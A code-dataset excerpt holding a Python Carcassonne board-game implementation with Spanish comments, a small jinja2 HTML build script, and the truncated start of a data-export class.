Inicializa los jugadores, en la primera posicion el mas joven y luego los demas aleatoriamente\n    def inicializar_jugadores_en_orden(self, jugador_mas_joven, jugadores):\n        lista_jugadores = []\n        lista_jugadores.append(Jugador(jugador_mas_joven[0]))\n        jugadores.remove(jugador_mas_joven)\n        
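# the remaining players are appended behind the youngest one in a random order\n        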
#random.shuffle(jugadores)\n jugadores = self.jugador_decide_orden(jugadores)\n for jugador in jugadores:\n lista_jugadores.append(Jugador(jugador[0]))\n return lista_jugadores\n\n #G Inicializa la lista por la edad de los jugadores.\n def jugador_mas_joven(self, jugadores):\n i = 0\n for jugador in jugadores:\n if i==0:\n edad = jugador[1]\n jugador_mas_joven = jugador\n elif jugador[1] < edad:\n edad = jugador[1]\n jugador_mas_joven = jugador\n i += 1\n return jugador_mas_joven\n\n #G Codigo del jugador con menos edad\n def info_jugador_mas_joven(self, jugadores):\n i = 0\n for jugador in jugadores:\n if i==0:\n edad = jugador[1]\n jugador_mas_joven = jugador\n elif jugador[1] < edad:\n edad = jugador[1]\n jugador_mas_joven = jugador\n i += 1\n return \"\\nEl jugador mas joven se llama \"+ jugador_mas_joven[0]+\".\\\n Es un adolescente de \" + jugador_mas_joven[1]+ \".\\n\"\n\n # Inicializa la baraja\n def inicializar_baraja(self):\n numero_tipos_pieza = 19\n baraja = []\n for i in range(numero_tipos_pieza):\n baraja += Pieza_terreno(i+1).repetir_pieza()\n return baraja\n\n # Inicializa el tablero\n def inicializar_tablero(self):\n tipo_pieza_inicial = 10\n pieza_inicial = Pieza_terreno(tipo_pieza_inicial)\n pieza_inicial.coordenadas = [0, 0]\n tablero = [pieza_inicial]\n return tablero\n\n #Asignar turnos a los jugadores\n def asignar_turnos(self, jugadores):\n turno = 1\n i = 1\n turnos_jugador = []\n numero_turnos = 72\n numero_jugadores = len(jugadores)\n while (turno < numero_turnos):\n turnos_jugador.append(jugadores[i-1])\n if i == numero_jugadores:\n i = 0\n turno = turno + 1\n i = i + 1\n return turnos_jugador\n\n # Inicializacion de la partida\n def inicializar(self, nombres_jugadores):\n if not self.num_jug_correcto(nombres_jugadores):\n return \"Numero de jugadores incorrecto. Solo pueden jugar entre 2 y 4 personas\"\n if not self.nombres_jug_correcto(nombres_jugadores):\n return \"No se puede repetir el nombre de dos jugadores\"\n self.turno = 0\n self.jugadores = self.inicializar_jugadores(nombres_jugadores)\n self.baraja = self.inicializar_baraja() # baraja = fichas que aun se pueden jugar\n random.shuffle(self.baraja) # aleatorizo la baraja\n self.tablero = self.inicializar_tablero() # tablero = fichas que ya se han jugado\n self.caminos_encontrados = [] # lista con los caminos que se completaron\n self.monasterios_encontrados = [] # lista con los caminos ya completados\n self.lista_turnos = self.asignar_turnos(self.jugadores) # orden de los turnos de los jugadores\n return self\n\n # G Inicializacion de la partida con el nuevo orden\n def inicializar_actualizado(self, jugadores):\n if not self.num_jug_correcto(jugadores):\n return \"Numero de jugadores incorrecto. 
Solo pueden jugar entre 2 y 4 personas\"\n nombres_jugadores = self.devuelve_nombres_jugadores(jugadores)\n if not self.nombres_jug_correcto(nombres_jugadores):\n return \"No se puede repetir el nombre de dos jugadores\"\n self.turno = 0\n jugador_mas_joven = self.jugador_mas_joven(jugadores)\n self.jugadores = self.inicializar_jugadores_en_orden(jugador_mas_joven, jugadores)\n self.baraja = self.inicializar_baraja() # baraja = fichas que aun se pueden jugar\n random.shuffle(self.baraja) # aleatorizo la baraja\n self.tablero = self.inicializar_tablero() # tablero = fichas que ya se han jugado\n self.caminos_encontrados = [] # lista con los caminos que se completaron\n self.monasterios_encontrados = [] # lista con los caminos ya completados\n self.lista_turnos = self.asignar_turnos(self.jugadores) # orden de los turnos de los jugadores\n return self\n\n # Busca el indice en el que se encuentra el jugador que se pasa en self.jugadores\n def buscar_ind_jugador(self, jugador_buscado):\n indice = None\n for i in range(len(self.jugadores)):\n if self.jugadores[i].nombre == jugador_buscado:\n indice = i\n return indice\n\n # Suma uno al turno de la partida y devuelve el jugador que juega ese turno\n def jugador_turno(self):\n self.turno += 1\n jugador_buscado = self.lista_turnos[self.turno-1]\n jugador = self.jugadores[self.buscar_ind_jugador(jugador_buscado.nombre)]\n return jugador\n\n # Saca una pieza de la baraja\n def sacar_pieza(self):\n pieza_sacada= []\n pieza_sacada = self.baraja[self.turno-1]\n self.baraja.pop(self.turno-1)\n return pieza_sacada\n\n #Funcion para obtener cual es la pieza que ya esta en el tablero\n def ver_pieza_tablero (self, coords):\n tablero = self.tablero\n for j in range(len(tablero)):\n if coords == tablero[j].coordenadas:\n pieza_tablero = tablero[j]\n break\n else:\n pieza_tablero = []\n return pieza_tablero\n\n def se_puede_poner_norte (self, pieza_norte, pieza_colocar):\n if (pieza_norte == []):\n return True\n elif (pieza_norte.posicion[4] == pieza_colocar.posicion[0]):\n return True\n else:\n return False\n\n def se_puede_poner_este (self, pieza_este, pieza_colocar):\n if (pieza_este == []):\n return True\n elif (pieza_este.posicion[6] == pieza_colocar.posicion[2]):\n return True\n else:\n return False\n\n def se_puede_poner_sur(self, pieza_sur, pieza_colocar):\n if (pieza_sur == []):\n return True\n elif (pieza_sur.posicion[0] == pieza_colocar.posicion[4]):\n return True\n else:\n return False\n def se_puede_poner_oeste(self, pieza_oeste, pieza_colocar):\n if (pieza_oeste == []):\n return True\n elif (pieza_oeste.posicion[2] == pieza_colocar.posicion[6]):\n return True\n else:\n return False\n\n # Funcion para comprobar si se puede colocar una pieza en la posicion requerida o no.\n def poner_pieza (self, pieza_colocar, coordenadas_colocar):\n coord_x = coordenadas_colocar[0]\n coord_y = coordenadas_colocar[1]\n pieza_norte = self.ver_pieza_tablero([coord_x, coord_y+1])\n pieza_oeste = self.ver_pieza_tablero([coord_x-1, coord_y])\n pieza_sur = self.ver_pieza_tablero([coord_x, coord_y-1])\n pieza_este = self.ver_pieza_tablero([coord_x+1, coord_y])\n comprobar_pieza = self.ver_pieza_tablero([coord_x,coord_y])\n if comprobar_pieza != []:\n return False\n elif (self.se_puede_poner_norte(pieza_norte, pieza_colocar) and self.se_puede_poner_este(pieza_este, pieza_colocar) and self.se_puede_poner_sur(pieza_sur, pieza_colocar) and self.se_puede_poner_oeste(pieza_oeste, pieza_colocar)) and (pieza_norte != [] or pieza_este !=[] or pieza_sur !=[] or pieza_oeste 
!=[]):\n pieza_colocar.jugador = self.jugadores[self.turno % len(self.jugadores)-1]\n pieza_colocar.coordenadas = coordenadas_colocar\n self.tablero.append(pieza_colocar)\n else:\n return False\n\n #Introducir meeple en la ultima ficha del tablero\n def introducir_meeple(self,posicion_meeple):\n jugador = self.jugadores[self.turno % len(self.jugadores)-1]\n if jugador.meeples > 0:\n self.tablero[-1].meeples = posicion_meeple\n jugador.meeples -= 1\n self.jugadores[self.turno % len(self.jugadores)-1] = jugador\n return True\n else:\n return False\n\n # Busca las piezas que tienen un tipo determinado en alguno de sus lados\n def buscar_tipo_en_tablero(self, tipo):\n tablero = self.tablero\n piezas_tipo = []\n for k in range(len(tablero)):\n if tipo in tablero[k].posicion:\n piezas_tipo.append(tablero[k])\n return piezas_tipo\n\n\n def comprobar_cierre_monasterio(self):\n monasterios = self.buscar_tipo_en_tablero(\"Monasterio\")\n self.sumar_puntos_monasterio(monasterios)\n\n # Suma los puntos en el caso de que se haya completado un monasterio que se pasa como argumento\n def sumar_puntos_monasterio(self, piezas_monasterio):\n puntos = 0\n for mon in range(len(piezas_monasterio)):\n if not (piezas_monasterio[mon] in self.monasterios_encontrados):\n nombre_jugador = piezas_monasterio[mon].jugador.nombre\n ind_jugador = self.buscar_ind_jugador(nombre_jugador)\n jugador_monasterio = self.jugadores[ind_jugador]\n coorx = piezas_monasterio[mon].coordenadas[0]\n coory = piezas_monasterio[mon].coordenadas[1]\n if(self.ver_pieza_tablero([coorx,coory-1]) != [] and self.ver_pieza_tablero([coorx,coory+1]) != [] and self.ver_pieza_tablero([coorx-1,coory]) != [] and self.ver_pieza_tablero([coorx+1,coory]) != []):\n # Suma 9 puntos por tener un monasterio completo\n puntos = 9\n jugador_monasterio.actualizar_puntuacion(puntos)\n self.jugadores[ind_jugador] = jugador_monasterio\n self.monasterios_encontrados.append(piezas_monasterio[mon])\n\n # Devuelve el/los jugador/es que mas meeples tienen en una lista de piezas que se le pasa\n def jugadores_con_mas_meeples(self, piezas, tipo_terreno):\n jugadores = []\n nombres_jugadores = [] # array con los nombres de los jugadores con meeple (se pueden repetir)\n for pieza in piezas:\n posiciones = pieza.posicion_tipo_terreno_en_pieza(tipo_terreno)\n if pieza.meeples in posiciones:\n nombres_jugadores.append(pieza.jugador.nombre)\n if len(nombres_jugadores) > 1:\n # Si hay mas de un jugador con meeples me quedo con el que mas tenga\n freq = collections.Counter(nombres_jugadores).values()\n max_freq = max(freq)\n total = freq.count(max_freq)\n mas_comun = collections.Counter(nombres_jugadores).most_common(total)\n nombres_jugadores = [elem[0] for elem in mas_comun] # ahora ya no estan repetidos\n # Introduzco el objeto de cada jugador en jugadores\n for nombre in nombres_jugadores:\n ind_jugador = self.buscar_ind_jugador(nombre)\n jugadores.append(self.jugadores[ind_jugador])\n return jugadores\n\n # Funcion que busca la pieza conectada a la que se pasa como argumento de un tipo de terreno concreto\n def evaluar_siguiente(self,pieza_actual,posicion_actual,tipo_terreno):\n pieza_siguiente = []\n num_pos_siguiente = None\n posicion_siguiente = None\n coord_x = pieza_actual.coordenadas[0]\n coord_y = pieza_actual.coordenadas[1]\n if posicion_actual == 0:\n coord_y += 1\n tmp = 4 # posicion de la siguiente a la que se conecta la actual\n elif posicion_actual == 2:\n coord_x += 1\n tmp = 6 # si es Este se conecta a la siguiente por Oeste\n elif posicion_actual == 4:\n 
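# exiting through the south edge lands on the tile below, which connects back through its north side (tmp = 0)\n            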
coord_y -= 1\n tmp = 0\n elif posicion_actual == 6:\n coord_x -= 1\n tmp = 2\n else:\n return pieza_siguiente, num_pos_siguiente, posicion_siguiente\n pieza_siguiente = self.ver_pieza_tablero([coord_x,coord_y])\n if pieza_siguiente != []:\n posiciones_siguiente = pieza_siguiente.posicion_tipo_terreno_en_pieza(\"Camino\")\n num_pos_siguiente = len(posiciones_siguiente)\n # Me quedo con la posicion del otro lado en el caso de que dos lados sean Camino\n if num_pos_siguiente == 2:\n for posicion in posiciones_siguiente:\n if posicion != tmp:\n posicion_siguiente = posicion\n return pieza_siguiente, num_pos_siguiente, posicion_siguiente\n\n\n # Funcion que busca si una pieza del camino forma parte de un camino cerrado\n def buscar_caminos_cerrados(self, pieza):\n posiciones = pieza.posicion_tipo_terreno_en_pieza(\"Camino\")\n max_caminos_posibles = [1, 1, 3, 4]\n caminos = []\n for ind_camino in range(max_caminos_posibles[len(posiciones)-1]):\n piezas_camino = [] # piezas que forman el camino\n terminaciones = [] # piezas que terminan el camino\n pieza_actual = pieza\n num_pos_actual = len(posiciones)\n posicion_actual = posiciones[ind_camino]\n while pieza_actual != []:\n piezas_camino.append(pieza_actual)\n if num_pos_actual != 2:\n terminaciones.append(pieza_actual)\n if len(terminaciones) < 2:\n pieza_actual,num_pos_actual,posicion_actual = self.evaluar_siguiente(pieza_actual,posicion_actual,\"Camino\")\n else:\n break;\n if len(terminaciones)==2:\n piezas_camino.sort(key=lambda x: (x.coordenadas[0],x.coordenadas[1]))\n caminos.append(piezas_camino)\n return caminos\n\n # Comprueba si algun camino se ha cerrado\n def comprobar_cierre_camino(self):\n caminos = self.buscar_tipo_en_tablero(\"Camino\")\n for pieza_camino in caminos:\n # Para cada pieza de camino compruebo si participa en algun camino ya cerrado\n piezas_caminos = self.buscar_caminos_cerrados(pieza_camino) # devuelve lista de caminos cerrados\n for piezas_camino in piezas_caminos:\n # Para cada camino cerrado, si no estaba ya contado lo introduzco y sumo la puntuacion\n if (piezas_camino != []) and not (piezas_camino in self.caminos_encontrados):\n self.caminos_encontrados.append(piezas_camino)\n jugadores = self.jugadores_con_mas_meeples(piezas_camino,\"Camino\")\n for jugador in jugadores:\n # A cada jugador le sumo la puntuacion y le devuelvo los meeples\n ind_jugador = self.buscar_ind_jugador(jugador.nombre)\n self.jugadores[ind_jugador].actualizar_puntuacion(len(piezas_camino))\n self.jugadores[ind_jugador].meeples += 1\n\n #Metodos para buscar castillos cerrados(recursivo)\n def es_castillo(self,pieza):\n #posibles_castillos = self.buscar_tipo_en_tablero(\"Castillo\")\n pieza_siguiente = None\n encontrado = False\n castillo = False\n posiciones = pieza.posicion_tipo_terreno_en_pieza2(\"Castillo\")\n coord_x = pieza.coordenadas[0]\n coord_y = pieza.coordenadas[1]\n piezas_totales = []\n piezas_castillos = []\n if posiciones == []:\n return False\n else:\n piezas_totales.append(pieza)\n for i in posiciones:\n pieza_inicio = pieza\n if i == 1:\n #inicio == 1\n coord_x2 = coord_x +1\n pieza_siguiente = self.ver_pieza_tablero([coord_x2,coord_y])\n coord_y2 = coord_y +1\n pieza_siguiente2 = self.ver_pieza_tablero([coord_x,coord_y2])\n if pieza_siguiente != []:\n piezas_totales,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente,piezas_totales)\n\n if pieza_siguiente2 != []:\n piezas_totales,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente2,piezas_totales)\n else:\n if pieza.tipo 
!= 9:\n if pieza.tipo !=15:\n castillo = False\n break\n\n\n if i == 3:\n coord_x2 = coord_x +1\n pieza_siguiente = self.ver_pieza_tablero([coord_x2,coord_y])\n coord_y2 = coord_y -1\n pieza_siguiente = self.ver_pieza_tablero([coord_x,coord_y2])\n if pieza_siguiente != []:\n piezas_totales,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente,piezas_totales)\n\n elif pieza_siguiente != []:\n piezas_totales,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente2,piezas_totales)\n else:\n\n if pieza.tipo != 9:\n if pieza.tipo !=15:\n castillo = False\n break\n if i == 5:\n coord_x2 = coord_x - 1\n pieza_siguiente = self.ver_pieza_tablero([coord_x2,coord_y])\n coord_y2 = coord_y -1\n pieza_siguiente2 = self.ver_pieza_tablero([coord_x,coord_y2])\n if pieza_siguiente != []:\n piezas_totales,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente,piezas_totales)\n\n elif pieza_siguiente2 != []:\n piezas_totales,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente2,piezas_totales)\n else:\n a=1\n\n\n if pieza.tipo != 9:\n if pieza.tipo !=15:\n castillo = False\n break\n if i == 7:\n #inicio == 7\n coord_x2 = coord_x - 1\n pieza_siguiente = self.ver_pieza_tablero([coord_x2,coord_y])\n coord_y2 = coord_y +1\n pieza_siguiente = self.ver_pieza_tablero([coord_x,coord_y2])\n if pieza_siguiente != []:\n piezas_totales,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente,piezas_totales)\n\n elif pieza_siguiente2 != []:\n piezas_totales,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente2,piezas_totales)\n else:\n a=1\n\n if pieza.tipo != 9:\n if pieza.tipo !=15:\n castillo = False\n break\n\n if castillo == True: #Castillo cerrado\n numero_piezas = len(piezas_totales)\n self.piezas_castillos = piezas_totales\n break\n return castillo,(piezas_totales)\n\n\n\n def buscar_castillos(self,pieza_inicio,pieza,piezas):\n posiciones = pieza.posicion_tipo_terreno_en_pieza2(\"Castillo\")\n castillo = False\n if posiciones == []:\n return False\n else:\n for m,k in enumerate(piezas):\n if (k!= pieza) & (len(piezas)-1 == m) :\n piezas.append(pieza)\n for j,i in enumerate(posiciones):\n piezas, castillo, pieza_inicio =self.casos(pieza,piezas,i,pieza_inicio,j)\n return piezas,castillo,pieza_inicio\n\n\n def casos(self,pieza,piezas,i,pieza_inicio,j):\n posiciones = pieza.posicion_tipo_terreno_en_pieza2(\"Castillo\")\n analizar = True\n castillo = False\n coord_x = pieza.coordenadas[0]\n coord_y = pieza.coordenadas[1]\n if i == 1:\n #inicio == 1\n coord_x2 = coord_x +1\n pieza_siguiente = self.ver_pieza_tablero([coord_x2,coord_y])\n coord_y2 = coord_y +1\n pieza_siguiente2 = self.ver_pieza_tablero([coord_x,coord_y2])\n if pieza_siguiente != []:\n for k in piezas:\n if k== pieza_siguiente:\n analizar = False\n if (k == pieza_inicio) & (len(posiciones)-1 ==j):\n castillo= True\n if analizar == True:\n piezas.append(pieza)\n piezas,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente,piezas)\n\n if pieza_siguiente2 != []:\n for k in piezas:\n if k== pieza_siguiente2:\n analizar = False\n if (k == pieza_inicio) & (len(posiciones)-1 ==j):\n castillo= True\n if analizar == True:\n piezas,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente2,piezas)\n else:\n castillo = False\n\n if i == 3:\n\n coord_x2 = coord_x +1\n pieza_siguiente = self.ver_pieza_tablero([coord_x2,coord_y])\n coord_y2 = coord_y -1\n pieza_siguiente2 = 
self.ver_pieza_tablero([coord_x,coord_y2])\n if pieza_siguiente != []:\n for k in piezas:\n if k== pieza_siguiente:\n analizar = False\n if (k == pieza_inicio) & (len(posiciones)-1 ==j):\n castillo= True\n if analizar == True:\n piezas,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente,piezas)\n\n elif pieza_siguiente2 != []:\n for k in piezas:\n if k== pieza_siguiente2:\n analizar = False\n if (k == pieza_inicio) & (len(posiciones)-1 ==j):\n castillo= True\n if analizar == True:\n piezas,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente2,piezas)\n else:\n castillo = False\n if i == 5:\n coord_x2 = coord_x - 1\n pieza_siguiente = self.ver_pieza_tablero([coord_x2,coord_y])\n coord_y2 = coord_y -1\n pieza_siguiente2 = self.ver_pieza_tablero([coord_x,coord_y2])\n if pieza_siguiente != []:\n for k in piezas:\n if k== pieza_siguiente:\n analizar = False\n if (k == pieza_inicio) & (len(posiciones)-1 ==j):\n castillo= True\n if analizar == True:\n piezas,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente,piezas)\n\n if pieza_siguiente2 != []:\n for k in piezas:\n if k== pieza_siguiente2:\n analizar = False\n if (k == pieza_inicio) & (len(posiciones)-1 ==j):\n castillo= True\n if analizar == True:\n piezas,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente2,piezas)\n else:\n castillo = False\n if (j == 7):\n #inicio == 7\n coord_x2 = coord_x - 1\n pieza_siguiente = self.ver_pieza_tablero([coord_x2,coord_y])\n coord_y2 = coord_y +1\n pieza_siguiente2 = self.ver_pieza_tablero([coord_x,coord_y2])\n if pieza_siguiente != []:\n for k in piezas:\n if k== pieza_siguiente:\n analizar = False\n if (k == pieza_inicio) & (len(posiciones)-1 ==j):\n castillo= True\n if analizar == True:\n piezas,castillo,pieza_inicio = self.buscar_castillos(pieza_siguiente,piezas)\n\n elif pieza_siguiente2 != []:\n for k in piezas:\n if k== pieza_siguiente2:\n analizar = True\n if (k == pieza_inicio) & (len(posiciones)-1 ==j):\n castillo= True\n if analizar == False:\n piezas,castillo,pieza_inicio = self.buscar_castillos(pieza_siguiente2,piezas)\n else:\n castillo = False\n return piezas, castillo, pieza_inicio\n\n\n #Contabilizar puntos por castillos cerrados\n def puntuacion_castillos(self,piezas,castillo):\n jugadores = []\n jugadores1 = []\n if castillo == True:\n for pieza in piezas:\n if pieza.meeples != None:\n jugadores.append(pieza.jugador)\n if len(jugadores) == 1:\n if len(piezas)>2:\n puntos = 2*len(piezas)\n else:\n puntos = 2\n jugadores[0].actualizar_puntuacion(puntos)\n jugadores[0].meeples += 1\n else:\n j_mas_meeples = jugadores_con_mas_meeples(piezas, 'Castillo')\n if len(j_mas_meeples)>1:\n for jugadores in j_mas_meeples:\n jugadores.actualizar_puntuacion(10)\n jugadores.meeples += 1\n else:\n if len(piezas)>2:\n puntos = 2*len(piezas)\n else:\n puntos = 2\n jugadores[0].actualizar_puntuacion(puntos)\n jugadores.meeples += 1\n\n\n # Comprueba los cierres de los distintos tipos de terreno al final de cada turno\n def comprobar_cierres(self):\n self.comprobar_cierre_monasterio()\n self.comprobar_cierre_camino()\n\n # Comprueba el/los jugador/es con mas meeples en granjas y le suma diez puntos\n def comprobar_cierre_granjas(self):\n jugadores = self.jugadores_con_mas_meeples(self.tablero, \"Granja\")\n for jugador in jugadores:\n ind_jugador = self.buscar_ind_jugador(jugador.nombre)\n self.jugadores[ind_jugador].actualizar_puntuacion(10)\n\n # Ordenar los jugadores en funcion de la puntuacion de cada uno de ellos\n 
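# (descendente: reverse=True coloca primero la puntuacion mas alta)\n    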
def orden_jugadores_ptos(self,lista_jugadores):\n lista_jugadores_aux = sorted(lista_jugadores, key = lambda objeto: objeto.puntuacion, reverse = True)\n return lista_jugadores_aux\n\nclass Jugador:\n\n # Inicializa la clase jugador\n def __init__(self, nombre):\n self.nombre = nombre\n self.meeples = 8 # meeples disponibles\n self.puntuacion = 0\n self.edad = 0\n\n\n #Actualizar puntuacion\n def actualizar_puntuacion(self, puntos):\n self.puntuacion += puntos\n return self\n\n #G Cambiar nombre\n def cambiar_nombre(self, nombre):\n self.nombre = nombre\n\n #G Asignar edad\n def asignar_edad(self, edad):\n self.edad = edad\n\nclass Pieza_terreno:\n\n # Devuelve los indices de posicion en los que coincide el tipo de terreno\n # que se pasa como argumento\n def posicion_tipo_terreno_en_pieza(self,tipo_terreno):\n indices_posicion = []\n # Elimino las esquinas en el caso del camino\n if tipo_terreno == \"Granja\":\n posicion = self.posicion[0:7]\n for i in range(len(posicion)):\n if posicion[i] == tipo_terreno:\n indices_posicion.append(i)\n else:\n posicion = self.posicion[0:7:2]\n for i in range(len(posicion)):\n if posicion[i] == tipo_terreno:\n indices_posicion.append(i*2)\n # Me quedo con aquellos indices en los que coincida el tipo de terreno\n return indices_posicion\n\n # Devuelve todos los indices de posicion en los que coincide el tipo de terreno\n # que se pasa como argumento\n def posicion_tipo_terreno_en_pieza2(self,tipo_terreno):\n # Elimino las esquinas\n posicion = self.posicion\n # Me quedo con aquellos indices en los que coincida el tipo de terreno\n indices_posicion = []\n for i in range(len(posicion)):\n if posicion[i] == tipo_terreno:\n indices_posicion.append(i)\n return indices_posicion\n\n\n # Repite cada pieza el numero de veces que aparezca en el juego original\n def repetir_pieza(self):\n if self.tipo == 1:\n pieza_repetida = 9*[self]\n elif self.tipo == 2:\n pieza_repetida = 8*[self]\n elif self.tipo == 3:\n pieza_repetida = 5*[self]\n elif self.tipo == 4:\n pieza_repetida = 5*[self]\n elif self.tipo == 5:\n pieza_repetida = 5*[self]\n elif self.tipo == 6:\n pieza_repetida = 4*[self]\n elif self.tipo == 7:\n pieza_repetida = 4*[self]\n elif self.tipo == 8:\n pieza_repetida = 4*[self]\n elif self.tipo == 9:\n pieza_repetida = 3*[self]\n elif self.tipo == 10:\n pieza_repetida = 3*[self]\n elif self.tipo == 11:\n pieza_repetida = 3*[self]\n elif self.tipo == 12:\n pieza_repetida = 3*[self]\n elif self.tipo == 13:\n pieza_repetida = 3*[self]\n elif self.tipo == 14:\n pieza_repetida = 3*[self]\n elif self.tipo == 15:\n pieza_repetida = 3*[self]\n elif self.tipo == 16:\n pieza_repetida = 2*[self]\n elif self.tipo == 17:\n pieza_repetida = 2*[self]\n elif self.tipo == 18:\n pieza_repetida = 1*[self]\n elif self.tipo == 19:\n pieza_repetida = 1*[self]\n return pieza_repetida\n\n # Asigna los distintos tipos de territorios al atributo posicion. 
El array se\n # corresponderia con la parte ['Norte','Noreste','Este','Sureste','Sur','Suroeste','Oeste','Noroeste','Centro'] de la pieza\n def asignar_posicion(self, tipo):\n if tipo == 1:\n posicion = ['Granja','Granja','Granja','Granja','Camino','Granja','Camino','Granja','']\n elif tipo == 2:\n posicion = ['Camino','Granja','Granja','Granja','Camino','Granja','Granja','Granja','']\n elif tipo == 3:\n posicion = ['Castillo','Castillo','Camino','Granja','Camino','Castillo','Castillo','Castillo','']\n elif tipo == 4:\n posicion = ['Castillo','Castillo','Granja','Granja','Granja','Castillo','Castillo','Castillo','']\n elif tipo == 5:\n posicion = ['Granja','Castillo','Castillo','Castillo','Granja','Granja','Granja','Granja','']\n elif tipo == 6:\n posicion = ['Castillo','Castillo','Castillo','Castillo','Granja','Castillo','Castillo','Castillo','']\n elif tipo == 7:\n posicion = ['Granja','Granja','Camino','Granja','Camino','Granja','Camino','Granja','']\n elif tipo == 8:\n posicion = ['Granja','Granja','Granja','Granja','Granja','Granja','Granja','Granja','Monasterio']\n elif tipo == 9:\n posicion = ['Granja','Castillo','Castillo','Castillo','Granja','Castillo','Castillo','Castillo','']\n elif tipo == 10:\n posicion = ['Camino','Castillo','Castillo','Castillo','Camino','Granja','Granja','Granja','']\n elif tipo == 11:\n posicion = ['Camino','Castillo','Castillo','Castillo','Camino','Granja','Camino','Granja','']\n elif tipo == 12:\n posicion = ['Castillo','Castillo','Castillo','Castillo','Camino','Castillo','Castillo','Castillo','']\n elif tipo == 13:\n posicion = ['Castillo','Castillo','Camino','Granja','Camino','Granja','Granja','Castillo','']\n elif tipo == 14:\n posicion = ['Camino','Castillo','Castillo','Castillo','Granja','Granja','Camino','Granja','']\n elif tipo == 15:\n posicion = ['Castillo','Castillo','Granja','Castillo','Castillo','Castillo','Granja','Castillo','']\n elif tipo == 16:\n posicion = ['Granja','Castillo','Castillo','Castillo','Castillo','Castillo','Granja','Granja','']\n elif tipo == 17:\n posicion = ['Granja','Granja','Granja','Granja','Camino','Granja','Granja','Granja','Monasterio']\n elif tipo == 18:\n posicion = ['Camino','Granja','Camino','Granja','Camino','Granja','Camino','Granja','']\n elif tipo == 19:\n posicion = ['Castillo','Castillo','Castillo','Castillo','Castillo','Castillo','Castillo','Castillo','']\n return posicion\n\n # Inicializa la clase pieza territorio\n def __init__(self, tipo):\n self.tipo = tipo\n # Posicion = ['Norte','Noreste','Este','Sureste','Sur','Suroeste','Oeste','Noroeste','Centro']\n self.posicion = self.asignar_posicion(tipo)\n # Coordenada X y coordenada Y\n self.coordenadas = [None,None]\n # Si no hay ningun meeple colocado, self.meeples = None. 
Si lo hay,\n # self.meeples toma el valor de la parte en la que se coloca:\n # 0: norte, 1: noreste, 2: este, 3:sureste, 4: sur, 5: suroeste, 6: oeste, 7: noroeste, 8: Centro\n self.meeples = None\n # Jugador que ha colocado la pieza\n self.jugador = None\n","sub_path":"carcassonne.py","file_name":"carcassonne.py","file_ext":"py","file_size_in_byte":35693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"286874596","text":"import os\nimport jinja2\nimport re\nimport json\n\n\ndef sub_urls(contents):\n\treturn re.sub(r\"(href|src)=\\\"((?!http)[^/].+)\\\"\", \"\\\\g<1>=\\\"http://localhost/\\\\g<2>\\\"\", contents)\n\n\ndef render_template(contents, cfg):\n\ttemplate = jinja2.Template(contents)\n\tcontents = template.render(**cfg)\n\n\tcontents = sub_urls(contents)\n\n\treturn contents\n\n\ndef render(getpath, putpath, midfunc, *args):\n\tif getpath.endswith(\".html\"):\n\t\twith open(getpath, \"r\", encoding=\"utf8\") as f:\n\t\t\tcontents = f.read()\n\n\t\tcontents = midfunc(contents, *args)\n\n\t\twith open(putpath, \"w\", encoding=\"utf8\") as f:\n\t\t\tf.write(contents)\n\nRESERVED_DIRS = [ \"!templates\", \"!template_vals\" ]\n\ndef build(src=\"src\", dest=\"build\"):\n\t\"\"\"\n\tThis is designed to make it easier to format files to export them to App Inventor.\n\n\tEvery template in the templates folder should have a corresponding json file of the same name in the templates folder which will be used to\n\trender the template with jinja2\n\n\t\"\"\"\n\tif not os.path.isdir(dest):\n\t\tos.mkdir(dest)\n\n\tfor filename in os.listdir(src):\n\t\tget_path = f\"{src}/{filename}\"\n\t\tput_path = f\"{dest}/{filename}\"\n\n\t\tif os.path.isfile(get_path):\n\t\t\tif filename.endswith(\".html\"):\n\t\t\t\trender(get_path, put_path, sub_urls)\n\t\t\telse:\n\t\t\t\twith open(get_path, \"rb\") as r, open(put_path, \"wb\") as w:\n\t\t\t\t\tw.write(r.read())\n\n\ttemplate_path = f\"{src}/!templates\"\n\tif os.path.isdir(template_path):\n\t\tfor filename in os.listdir(template_path):\n\t\t\tput_path = f\"{dest}/{filename}\"\n\t\t\tget_path = f\"{src}/!templates/{filename}\"\n\t\t\tget_cfg_path = f\"{src}/!template_vals/{'.'.join(filename.split('.')[:-1])}.json\"\n\n\t\t\twith open(get_cfg_path, \"r\", encoding=\"utf8\") as f:\n\t\t\t\tcfg = json.load(f)\n\n\t\t\trender(get_path, put_path, render_template, cfg)\n\n\tfor dir in os.listdir(src):\n\t\tpath = f\"{src}/{dir}\"\n\n\t\tif not os.path.isdir(path) or dir in RESERVED_DIRS:\n\t\t\tcontinue\n\n\t\tbuild(path) # Recursive for folders inside the build\n\n\nif __name__ == \"__main__\":\n\tbuild()\n","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"402657268","text":"from openpyxl import load_workbook\nimport xlsxwriter\nimport pandas as pd\nfrom dsp.save_data import get_output_fpath, save_param_info\nfrom extra.lr_sig import LrSig\n\n\nclass SaveRawData:\n def __init__(self, filepath, dsp, epr_df, rv_dict, version_info, is_dev):\n self.filepath = filepath\n self.params = dsp.parameters\n self.epr_df = epr_df\n self.rv_dict = rv_dict\n self.res_dict = dsp.result_data_dict_raw\n self.version_info = version_info\n self.is_dev = is_dev\n self.lr = LrSig(dsp.result_dict_fi, self.params, dsp.data_raw_dic)\n\n def export_raw_datasheet(self):\n self.fpath = get_output_fpath(self.filepath, 'raw_datasheet_')\n with 